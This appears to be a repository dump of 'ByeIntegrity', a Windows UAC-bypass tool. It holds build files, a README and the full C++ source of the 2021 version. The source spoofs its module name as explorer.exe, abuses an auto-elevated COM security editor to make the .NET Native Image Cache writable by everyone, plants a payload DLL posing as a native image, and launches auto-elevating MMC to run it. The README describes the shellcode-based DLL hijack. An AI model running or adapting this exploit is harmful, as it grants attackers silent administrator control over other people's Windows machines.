<FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <SDLCheck>true</SDLCheck>\n      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <ConformanceMode>true</ConformanceMode>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      
<OptimizeReferences>true</OptimizeReferences>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <AdditionalDependencies>fusion.lib;%(AdditionalDependencies)</AdditionalDependencies>\n      <DelayLoadDLLs>fusion.dll</DelayLoadDLLs>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <SDLCheck>true</SDLCheck>\n      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <ConformanceMode>true</ConformanceMode>\n      <LanguageStandard>stdcpp17</LanguageStandard>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <AdditionalDependencies>fusion.lib;%(AdditionalDependencies)</AdditionalDependencies>\n      <DelayLoadDLLs>fusion.dll</DelayLoadDLLs>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <SDLCheck>true</SDLCheck>\n      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <ConformanceMode>true</ConformanceMode>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <AdditionalDependencies>fusion.lib;%(AdditionalDependencies)</AdditionalDependencies>\n      <DelayLoadDLLs>fusion.dll</DelayLoadDLLs>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemGroup>\n    <ClCompile Include=\"AUXGen.cpp\" />\n  </ItemGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.targets\" />\n  <ImportGroup 
Label=\"ExtensionTargets\">\n  </ImportGroup>\n</Project>"
  },
  {
    "path": "AUXGen/AUXGen.vcxproj.filters",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup>\n    <ClCompile Include=\"AUXGen.cpp\" />\n  </ItemGroup>\n</Project>"
  },
  {
    "path": "ByeIntegrity2021/ByeIntegrity2021.vcxproj",
    "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup Label=\"ProjectConfigurations\">\n    <ProjectConfiguration Include=\"Debug|Win32\">\n      <Configuration>Debug</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|Win32\">\n      <Configuration>Release</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Debug|x64\">\n      <Configuration>Debug</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|x64\">\n      <Configuration>Release</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n  </ItemGroup>\n  <PropertyGroup Label=\"Globals\">\n    <VCProjectVersion>16.0</VCProjectVersion>\n    <Keyword>Win32Proj</Keyword>\n    <ProjectGuid>{7cdc9c5f-6dee-4d33-a8ad-610194b1a017}</ProjectGuid>\n    <RootNamespace>ByeIntegrity2021</RootNamespace>\n    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v143</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v143</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup 
Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v143</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v143</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.props\" />\n  <ImportGroup Label=\"ExtensionSettings\">\n  </ImportGroup>\n  <ImportGroup Label=\"Shared\">\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" 
Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <PropertyGroup Label=\"UserMacros\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <LinkIncremental>true</LinkIncremental>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <LinkIncremental>false</LinkIncremental>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <LinkIncremental>true</LinkIncremental>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <LinkIncremental>false</LinkIncremental>\n  </PropertyGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <SDLCheck>true</SDLCheck>\n      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <ConformanceMode>true</ConformanceMode>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <AdditionalDependencies>ntdll.lib;%(AdditionalDependencies)</AdditionalDependencies>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <SDLCheck>true</SDLCheck>\n      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <ConformanceMode>true</ConformanceMode>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n      
<GenerateDebugInformation>true</GenerateDebugInformation>\n      <AdditionalDependencies>ntdll.lib;%(AdditionalDependencies)</AdditionalDependencies>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <SDLCheck>true</SDLCheck>\n      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <ConformanceMode>true</ConformanceMode>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <AdditionalDependencies>ntdll.lib;%(AdditionalDependencies)</AdditionalDependencies>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <SDLCheck>true</SDLCheck>\n      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <ConformanceMode>true</ConformanceMode>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <AdditionalDependencies>ntdll.lib;%(AdditionalDependencies)</AdditionalDependencies>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemGroup>\n    <ClCompile Include=\"byeintegrity2021.cpp\" />\n  </ItemGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.targets\" />\n  <ImportGroup Label=\"ExtensionTargets\">\n  </ImportGroup>\n</Project>"
  },
  {
    "path": "ByeIntegrity2021/ByeIntegrity2021.vcxproj.filters",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup>\n    <ClCompile Include=\"byeintegrity2021.cpp\" />\n  </ItemGroup>\n</Project>"
  },
  {
    "path": "ByeIntegrity2021/byeintegrity2021.cpp",
    "content": "#include <Windows.h>\n#include <winternl.h>\n#include <AccCtrl.h>\n#include <ShlObj.h>\n#include <wrl.h>\n#include <iostream>\n#include <string>\n#include <memory>\nusing Microsoft::WRL::ComPtr;\n\nEXTERN_C IMAGE_DOS_HEADER __ImageBase;\n\n#define COUT_FAILED_HR(func, hr) (std::wcout << func << L\"() failed. HRESULT: 0x\" << std::hex << hr << std::endl)\n#define COUT_FAILED_WIN32(func, err) (std::wcout << func << L\"() failed. Error: \" << err << std::endl)\n\nconstexpr GUID IID_ISecurityEditor{ 0x14B2C619, 0xD07A, 0x46EF, {0x8B, 0x62, 0x31, 0xB6, 0x4F, 0x3B, 0x84, 0x5C} };\n\ntypedef struct\n{\n\tLIST_ENTRY InLoadOrderLinks;\n\tLIST_ENTRY InMemoryOrderLinks;\n\tLIST_ENTRY InInitializationOrderLinks;\n\tPVOID DllBase;\n\tPVOID EntryPoint;\n\tULONG SizeOfImage;\n\tUNICODE_STRING FullDllName;\n\tUNICODE_STRING BaseDllName;\n\t// more stuff underneath . . .\n} LDR_DATA_TABLE_ENTRY2, * PLDR_DATA_TABLE_ENTRY2;\n\nstruct ComSession\n{\n\tHRESULT Result;\n\tComSession() : Result(CoInitializeEx(nullptr, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE | COINIT_SPEED_OVER_MEMORY))\n\t{}\n\t~ComSession()\n\t{\n\t\tif (SUCCEEDED(Result))\n\t\t\tCoUninitialize();\n\t}\n};\n\nstruct ISecurityEditor : IUnknown\n{\n\tvirtual HRESULT WINAPI GetSecurity(\n\t\tLPCOLESTR ObjectName,\n\t\tSE_OBJECT_TYPE ObjectType,\n\t\tSECURITY_INFORMATION SecurityInfo,\n\t\tLPCOLESTR* ppSDDLStr\n\t) = 0;\n\tvirtual HRESULT WINAPI SetSecurity(\n\t\tLPCOLESTR ObjectName,\n\t\tSE_OBJECT_TYPE ObjectType,\n\t\tSECURITY_INFORMATION SecurityInfo,\n\t\tLPCOLESTR pSDDLStr\n\t) = 0;\n};\n\nusing PLDR_ENUM_CALLBACK = VOID(NTAPI*)(PLDR_DATA_TABLE_ENTRY2 entry, PVOID context, PBOOLEAN stop);\n\nEXTERN_C NTSTATUS LdrEnumerateLoadedModules(ULONG flags, PLDR_ENUM_CALLBACK enumProc, PVOID context);\n\nint wmain()\n{\n\tauto hOutput{ GetStdHandle(STD_OUTPUT_HANDLE) };\n\tSetConsoleTextAttribute(hOutput, 8);\n\tstd::wcout << L\" __________              .___        __                      .__  __       
    /\\\\________  ____ \\n\" \\\n\t\tL\" \\\\______   \\\\___.__. ____ |   | _____/  |_  ____   ___________|__|/  |_ ___.__. )/\\\\_____  \\\\/_   |\\n\" \\\n\t\tL\"  |    |  _<   |  |/ __ \\\\|   |/    \\\\   __\\\\/ __ \\\\ / ___\\\\_  __ \\\\  \\\\   __<   |  |    /  ____/ |   |\\n\" \\\n\t\tL\"  |    |   \\\\\\\\___  \\\\  ___/|   |   |  \\\\  | \\\\  ___// /_/  >  | \\\\/  ||  |  \\\\___  |   /       \\\\ |   |\\n\" \\\n\t\tL\"  |______  // ____|\\\\___  >___|___|  /__|  \\\\___  >___  /|__|  |__||__|  / ____|   \\\\_______ \\\\|___|\\n\" \\\n\t\tL\"         \\\\/ \\\\/         \\\\/         \\\\/          \\\\/_____/                 \\\\/                \\\\/     \\n\\n\";\n\tSetConsoleTextAttribute(hOutput, 7);\n\n\tComSession comSession;\n\tif (FAILED(comSession.Result))\n\t{\n\t\tCOUT_FAILED_HR(L\"CoInitializeEx\", comSession.Result);\n\t\treturn 1;\n\t}\n\n\tPWSTR winPath;\n\tauto hr{ SHGetKnownFolderPath(FOLDERID_Windows, 0, nullptr, &winPath) };\n\tif (FAILED(hr))\n\t{\n\t\tCOUT_FAILED_HR(L\"SHGetKnownFolderPath\", hr);\n\t\treturn 1;\n\t}\n\tstd::wstring explorer{ winPath }, asmPath{ winPath };\n\tCoTaskMemFree(winPath);\n\texplorer += L\"\\\\explorer.exe\";\n\n\thr = LdrEnumerateLoadedModules(0, [](PLDR_DATA_TABLE_ENTRY2 entry, PVOID context, PBOOLEAN stop)\n\t\t{\n\t\t\tif (entry->DllBase == &__ImageBase)\n\t\t\t{\n\t\t\t\tentry->BaseDllName.Buffer = const_cast<PWSTR>(L\"explorer.exe\");\n\t\t\t\tentry->BaseDllName.Length = sizeof(L\"explorer.exe\");\n\t\t\t\tentry->BaseDllName.MaximumLength = sizeof(L\"explorer.exe\");\n\n\t\t\t\tentry->FullDllName.Buffer = const_cast<PWSTR>(reinterpret_cast<std::wstring*>(context)->c_str());\n\t\t\t\tentry->FullDllName.Length = static_cast<USHORT>((reinterpret_cast<std::wstring*>(context)->length() + 1) * sizeof WCHAR);\n\t\t\t\tentry->FullDllName.MaximumLength = static_cast<USHORT>(reinterpret_cast<std::wstring*>(context)->capacity());\n\n\t\t\t\t*stop = TRUE;\n\t\t\t}\n\t\t}, &explorer);\n\tif 
(FAILED(hr))\n\t{\n\t\tstd::wcout << L\"LdrEnumerateLoadedModules() failed. NTSTATUS: 0x\" << std::hex << hr << std::endl;\n\t\treturn 1;\n\t}\n\n\tComPtr<ISecurityEditor> securityEditor;\n\tBIND_OPTS3 opts{};\n\topts.cbStruct = sizeof BIND_OPTS3;\n\topts.dwClassContext = CLSCTX_LOCAL_SERVER;\n\n\thr = CoGetObject(L\"Elevation:Administrator!new:{4D111E08-CBF7-4f12-A926-2C7920AF52FC}\", &opts, IID_ISecurityEditor, &securityEditor);\n\tif (FAILED(hr))\n\t{\n\t\tCOUT_FAILED_HR(L\"CoGetObject\", hr);\n\t\treturn 1;\n\t}\n\n\tasmPath += L\"\\\\assembly\\\\NativeImages_v4.0.30319_64\";\n\tstd::wstring workPath{ asmPath };\n\tLPCOLESTR oldSecurityPtr;\n\thr = securityEditor->GetSecurity(asmPath.c_str(), SE_FILE_OBJECT, DACL_SECURITY_INFORMATION, &oldSecurityPtr);\n\tif (FAILED(hr))\n\t{\n\t\tCOUT_FAILED_HR(L\"ISecurityEditor::GetSecurity\", hr);\n\t\treturn 1;\n\t}\n\tstd::wstring oldSecurity{ oldSecurityPtr };\n\tCoTaskMemFree(reinterpret_cast<LPVOID>(const_cast<PWSTR>(oldSecurityPtr)));\n\n\thr = securityEditor->SetSecurity(asmPath.c_str(), SE_FILE_OBJECT, DACL_SECURITY_INFORMATION, L\"D:PAI(A;OICI;FA;;;WD)\");\n\tif (FAILED(hr))\n\t{\n\t\tCOUT_FAILED_HR(L\"ISecurityEditor::SetSecurity\", hr);\n\t\treturn 1;\n\t}\n\n\tworkPath += L\"\\\\MMCEx\";\n\tstd::wstring oldPathName{ workPath + L\".old\" }, originalPath{ workPath };\n\tauto restore{ true };\n\tif (!MoveFileW(workPath.c_str(), oldPathName.c_str()))\n\t{\n\t\tif (GetLastError() != ERROR_FILE_NOT_FOUND)\n\t\t{\n\t\t\tsecurityEditor->SetSecurity(asmPath.c_str(), SE_FILE_OBJECT, DACL_SECURITY_INFORMATION, oldSecurity.c_str());\n\t\t\tCOUT_FAILED_WIN32(L\"MoveFileW\", GetLastError());\n\t\t\treturn 1;\n\t\t}\n\t\trestore = false;\n\t}\n\n\tif (!CreateDirectoryW(workPath.c_str(), nullptr))\n\t{\n\t\tif (restore)\n\t\t\tMoveFileW(oldPathName.c_str(), originalPath.c_str());\n\n\t\tsecurityEditor->SetSecurity(asmPath.c_str(), SE_FILE_OBJECT, DACL_SECURITY_INFORMATION, 
oldSecurity.c_str());\n\t\tCOUT_FAILED_WIN32(L\"CreateDirectoryW\", GetLastError());\n\t\treturn 1;\n\t}\n\n\tworkPath += L\"\\\\DEADBEEFDEADBEEFDEADBEEFDEADBEEF\";\n\tif (!CreateDirectoryW(workPath.c_str(), nullptr))\n\t{\n\t\tRemoveDirectoryW(originalPath.c_str());\n\n\t\tif (restore)\n\t\t\tMoveFileW(oldPathName.c_str(), originalPath.c_str());\n\n\t\tsecurityEditor->SetSecurity(asmPath.c_str(), SE_FILE_OBJECT, DACL_SECURITY_INFORMATION, oldSecurity.c_str());\n\t\tCOUT_FAILED_WIN32(L\"CreateDirectoryW\", GetLastError());\n\t\treturn 1;\n\t}\n\n\tauto niPath{ workPath + L\"\\\\MMCEx.ni.dll\" }, auxPath{ workPath + L\"\\\\MMCEx.ni.dll.aux\" };\n\tif (!MoveFileW(L\"payload.dll\", niPath.c_str()))\n\t{\n\t\tRemoveDirectoryW(workPath.c_str());\n\t\tRemoveDirectoryW(originalPath.c_str());\n\n\t\tif (restore)\n\t\t\tMoveFileW(oldPathName.c_str(), originalPath.c_str());\n\n\t\tsecurityEditor->SetSecurity(asmPath.c_str(), SE_FILE_OBJECT, DACL_SECURITY_INFORMATION, oldSecurity.c_str());\n\t\tCOUT_FAILED_WIN32(L\"MoveFileW\", GetLastError());\n\t\treturn 1;\n\t}\n\tif (!MoveFileW(L\"MMCEx.ni.dll.aux\", auxPath.c_str()))\n\t{\n\t\tDeleteFileW(niPath.c_str());\n\t\tRemoveDirectoryW(workPath.c_str());\n\t\tRemoveDirectoryW(originalPath.c_str());\n\n\t\tif (restore)\n\t\t\tMoveFileW(oldPathName.c_str(), originalPath.c_str());\n\n\t\tsecurityEditor->SetSecurity(asmPath.c_str(), SE_FILE_OBJECT, DACL_SECURITY_INFORMATION, oldSecurity.c_str());\n\t\tCOUT_FAILED_WIN32(L\"MoveFileW\", GetLastError());\n\t\treturn 1;\n\t}\n\n\tauto execResult{ reinterpret_cast<int>(ShellExecuteW(nullptr, L\"runas\", L\"mmc.exe\", L\"wf.msc\", nullptr, SW_NORMAL)) };\n\tSleep(1500);\n\tDeleteFileW(auxPath.c_str());\n\tDeleteFileW(niPath.c_str());\n\tRemoveDirectoryW(workPath.c_str());\n\tRemoveDirectoryW(originalPath.c_str());\n\tif (restore)\n\t\tMoveFileW(oldPathName.c_str(), originalPath.c_str());\n\tsecurityEditor->SetSecurity(asmPath.c_str(), SE_FILE_OBJECT, DACL_SECURITY_INFORMATION, 
oldSecurity.c_str());\n\tif (execResult <= 32)\n\t{\n\t\tCOUT_FAILED_WIN32(L\"ShellExecuteW\", execResult);\n\t\treturn 1;\n\t}\n\n\tSetConsoleTextAttribute(hOutput, 15);\n\tstd::wcout << L\"[+] \";\n\tSetConsoleTextAttribute(hOutput, 14);\n\tstd::wcout << L\"*** Exploit successful.\\n\\n\";\n\tSetConsoleTextAttribute(hOutput, 7);\n\n\treturn 0;\n}"
  },
  {
    "path": "README.md",
    "content": "# ByeIntegrity — Windows UAC Bypass\nBypass User Account Control (UAC) to gain elevated (Administrator) privileges to run any program at a high integrity level.\n![](example.gif)\n\n## Requirements\n- Administrator account\n- UAC notification level set to default or lower\n\n## 2021 Update\nI have decided to update ByeIntegrity so that it's much faster, lightweight, and reliable. This is a significant overhaul so I've created a new project in the VS solution called \"ByeIntegrity2021,\" which is the updated version of this attack. Of course, the original version is still there. For more information on the new version, expand the details below.\n\n<details>\n\t<summary>Update information</summary>\n\n---\nThe new version now is able to hijack the NIC without depending on the existing native images installed into the NIC. It does this by creating its own native image descriptors and payloads, then moving them into the NIC, eliminating the need for:\n  \n- Existing `*.ni` images produced by `NGEN.exe`\n- Running the system maintenance tasks\n- NIC directory traversal\n- Long wait/run time\n- Limited number of runs (before hijacked DLL runs out of space)\n  \nThe CLR loads native images from the NIC by doing a recursive directory scan of each entry, and then reading its `*.aux` file. This file contains information about the native image, and its dependencies. Based off the information in the `AUX` file, the CLR will either load the image or reject it, and then move on to the next candidate. If no viable candidates are found, it loads the standard image and uses jit to compile it normally. No part of the actual native image is read (it is only checked for its existence), so ByeIntegrity simply places the payload DLL with the same name the native image would have.\n  \nThe updated version of ByeIntegrity comes with a tool called **AUXGen**, which takes in the name of an assembly from the GAC and then generates its corresponding `AUX` file. 
The `AUX` file is generated so that it matches the CLR's checks and the CLR will load the \"native image\" which is described by the `AUX` file. Note: AUXGen does not handle dependencies when generating the `AUX` file. It only does as much as it needs to so that the CLR will load the image. I will post details of the `AUX` file format later.\n\nByeIntegrity now uses `ISecurityEditor`, just like UACMe does, which cuts down on the needed code. It also requires that you have generated the `AUX` file for the assembly `MMCEx`, and placed it in the same directory as ByeIntegrity. `MMCEx` is now the targeted image because of its load order and shorter name.\n  \n</details>\n\n## How it works\nByeIntegrity hijacks a DLL located in the Native Image Cache (NIC). The NIC is used by the .NET Framework to store optimized .NET Assemblies that have been generated from programs like Ngen, the .NET Framework Native Image Generator. Because Ngen is usually run under the current user with Administrative privileges through the Task Scheduler, the NIC grants modify access for members of the Administrators group.\n\nThe Microsoft Management Console (MMC) Windows Firewall Snap-in uses the .NET Framework, and upon initializing it, modules from the NIC are loaded into the MMC process. The MMC executable uses AutoElevate, a mechanism Windows uses that automatically elevates a process’s token without UAC prompting.\n\nByeIntegrity hijacks a specific DLL located in the NIC named `Accessibility.ni.dll`. It writes some shellcode into an appropriately-sized area of padding located in the `.text` section of the DLL. The entry point of the DLL is then updated to point to the shellcode. Upon DLL load, the entry point (which is actually the shellcode) is executed. The shellcode calculates the address of `kernel32!CreateProcessW`, creates a new instance of `cmd.exe` running as an Administrator, and then simply returns `TRUE`. 
This is only for the `DLL_PROCESS_ATTACH` reason; all other reasons will immediately return `TRUE`.\n## UACMe\nThis attack is implemented in UACMe as method #63. If you want to try out this attack, please use UACMe first. The attack is the same; however, UACMe uses a different method to modify the NIC. The original ByeIntegrity uses `IFileOperation` while UACMe uses `ISecurityEditor`. In addition, UACMe chooses the correct `Accessibility.ni.dll` for your system and performs the system maintenance tasks if necessary (to generate the NIC components). ByeIntegrity simply chooses the first NIC entry that exists (which may or may not be the correct entry that MMC is using) and does not run the system maintenance tasks. ByeIntegrity contains **significantly** more code than UACMe, so the UACMe implementation will be much easier to read and understand than the ByeIntegrity code. Lastly, ByeIntegrity launches a child process during the attack whereas UACMe does not.\n\n**tl;dr: UACMe is simpler and more effective than ByeIntegrity, so use UACMe first.**\n## Using the code\nIf you’re reading this then you probably know how to compile the source. Just note that this hasn’t been tested or designed with x86 in mind at all, and it probably won’t work on x86 anyways.\n\nJust like UACMe, **I will never upload compiled binaries to this repo.** There are always people who want the world to crash and burn, and I'm not going to provide an easy route for them to run this on somebody else's computer and cause intentional damage. I also don't want script-kiddies to use this attack without understanding what it does and the damage it can cause.\n## Supported Versions\nThis attack works from Windows 7 (7600) up until the latest version of Windows."
  },
  {
    "path": "byeintegrity/byeintegrity.vcxproj",
    "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup Label=\"ProjectConfigurations\">\n    <ProjectConfiguration Include=\"Debug|Win32\">\n      <Configuration>Debug</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|Win32\">\n      <Configuration>Release</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Debug|x64\">\n      <Configuration>Debug</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|x64\">\n      <Configuration>Release</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n  </ItemGroup>\n  <PropertyGroup Label=\"Globals\">\n    <VCProjectVersion>16.0</VCProjectVersion>\n    <ProjectGuid>{E1F82946-041D-49F3-860B-7CF7EC2C9620}</ProjectGuid>\n    <RootNamespace>byeintegrity</RootNamespace>\n    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v143</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v143</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" 
Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v143</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v143</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.props\" />\n  <ImportGroup Label=\"ExtensionSettings\">\n  </ImportGroup>\n  <ImportGroup Label=\"Shared\">\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" 